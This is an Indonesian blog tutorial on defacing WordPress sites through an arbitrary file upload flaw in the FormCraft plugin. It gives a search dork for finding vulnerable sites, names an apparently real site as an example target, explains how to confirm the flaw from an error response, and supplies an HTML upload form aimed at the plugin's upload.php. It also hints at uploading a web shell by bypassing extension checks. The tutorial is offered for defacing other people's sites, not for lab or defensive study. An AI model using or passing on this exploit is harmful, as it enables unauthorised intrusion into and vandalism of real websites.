» » » » Deface Wordpress Fromcraft Arbitrary File Upload
, ,

Deface Wordpress Fromcraft Arbitrary File Upload

tutorial kali ini admin akan share cara Deface Dengan Wordpress Plugin Formcraft

Oke Langsung capcus ke tutorial .


Dork: Index Of "/wp-content/plugins/formcraft/file-upload/server/" intext:content

Kembangin Lagi Biar Dapet Yang Verawan

Exploit: upload.php

Pertama Kalian Dorking dulu Dengan Dork Yg Diatas.

Pilih Salah Satu dulu aje ye :)

Buka Target Kalian Tadi Misal Gw > http://mclvt.org/wp-content/plugins/formcraft/file-upload/server/content/

Kalo Udah Gitu Masukin Exploit Upload.php atau tinggal klik aja :

Vuln? Error : {"failed":"No file found 2"}


Trus Masukin Target Kalian Di CSRF nya :) csrf di bawah entar ya!

Save CSRF dengan format namacsrf.html

Trus Buka Pake Browser lu ya, Jangan Pinjem Browser Orang xD

Pilih file txt kalian ahaha kali aja yg jago bypass extensi shell bisa nih ye wkwk.

trus klik upload.

Langsung Dikasih Akses file Kalian xD

Akses : localhost//wp-content/plugins/formcraft/file-upload/server/content/files/angkarandom_namafile.txt

Success ??? ☺

Oke Sekian tutorial Dari saya :) Semoga Bermanfaat

CSRF Nya :

<form method="POST" action="http://localhost/wp-content/plugins/formcraft/file-upload/server/content/upload.php"

enctype="multipart/form-data">

<input type="file" name="files[]" /><button>Upload</button>

</form>
Share on Facebook
Share on Twitter
Share on Google+
Share on LinkedIn

Subscribe to receive free email updates:

0 Response to "Deface Wordpress Fromcraft Arbitrary File Upload"

Post a Comment

Subscribe to: Post Comments (Atom)